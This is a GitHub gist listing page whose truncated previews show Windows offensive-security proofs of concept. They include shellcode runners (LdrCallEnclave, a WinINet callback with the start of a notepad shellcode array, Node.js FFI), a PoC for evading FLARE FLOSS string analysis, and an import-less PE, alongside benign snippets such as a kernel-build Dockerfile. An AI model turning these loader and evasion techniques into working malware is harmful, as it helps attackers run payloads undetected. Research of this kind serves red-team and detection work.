whokilleddb / enclave.c
Created August 3, 2025 21:35
Run shellcode using LdrCallEnclave
#include <stdio.h>
#include <windows.h>
// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclave.exe -lntdll
EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
_In_ PENCLAVE_ROUTINE Routine,
whokilleddb / JasonToddIsTheBestRobin.c
Created August 21, 2025 22:51
Unnecessarily complicated way of controlling shellcode execution from a WinINet status callback registered with InternetSetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
whokilleddb / Program.cs
Created October 29, 2025 22:27
CLR uses an executable heap - so why shouldn't we?
using System;
using System.Runtime.InteropServices;
namespace ExecutableHeapInfo
{
class Program
{
// Import GetProcessExecutableHeap from mscoreei.dll
[DllImport("mscoreei.dll", SetLastError = true)]
private static extern IntPtr GetProcessExecutableHeap();
whokilleddb / Program.cs
Created October 29, 2025 22:44 — forked from susMdT/Program.cs
haha funny jit go brrrr
using System;
using System.Runtime.CompilerServices;
using System.Reflection;
using System.Reflection.Emit;
namespace FunkyJit
{
class Program
{
public static void Nothing() { Console.WriteLine(); }
static void Main(string[] args)
whokilleddb / main.c
Created July 24, 2025 17:53
PoC code to evade string extraction by Mandiant's FLARE FLOSS
/*
main.c - Demonstrate how easy it is to bypass flare-floss with a single line
Compile with:
x86_64-w64-mingw32-gcc main.c -o main.exe -masm=intel
*/
#include <windows.h>
#include <stdio.h>
whokilleddb / LowNtReadFile.c
Created August 12, 2025 21:19
Read contents of a file using LowNtReadFile
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ntdll.lib")
#define FILE_TO_READ L"\\??\\C:\\Users\\DB\\Desktop\\test.txt"
EXTERN_C NTSTATUS NtOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions);
whokilleddb / main.cc
Created July 25, 2025 18:18
Run code before main()
#include <stdio.h>
#ifdef _MSC_VER
#ifdef __cplusplus
#define CONSTRUCTOR_FUNC(func) \
struct func##_constructor { \
func##_constructor() { func(); } \
}; \
whokilleddb / Dockerfile
Last active August 7, 2025 04:30
Dockerfile to compile the Linux kernel from source
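FROM debian:10.11 as source
WORKDIR /kernel
# Extra Metadata
# Written as key=value: the whitespace-separated `LABEL key = value` form is the
# deprecated legacy syntax and (depending on the builder) may store the literal
# `= "..."` as the label value. Also fixes the misspelled "desciption" key.
LABEL version="0.1.0"
LABEL description="Compile A Kernel"
# Install Dependencies
FROM source as init
# apt-get is the script-stable front end; `apt` warns that its CLI may change.
# NOTE(review): debian 10 (buster) is end-of-life, so a blanket upgrade pulls no
# security fixes and the default mirrors may no longer serve it -- confirm the
# build still resolves packages, and consider a supported base image. An
# unpinned upgrade also makes the image non-reproducible between builds.
RUN apt-get update && apt-get upgrade -y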
whokilleddb / launcher.c
Last active August 3, 2025 22:03
PE without any imports!
// Compile with: cl.exe /Ox /W0 /GS- launcher.c
// Check imports with: dumpbin /imports launcher.exe
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(linker, "/entry:WinMain")
// Function Pointers
whokilleddb / shellcode.js
Created October 11, 2023 11:16
NodeJS FFI to run shellcode!
const ffi = require('ffi-napi');
const ref = require("ref-napi");
const SIZE_T = ref.types.uint64;
const DWORD = ref.types.uint32;
const VOID = ref.types.void;
const LPVOID = ref.refType(VOID);
const HANDLE = LPVOID;
const LPDWORD = ref.refType(DWORD);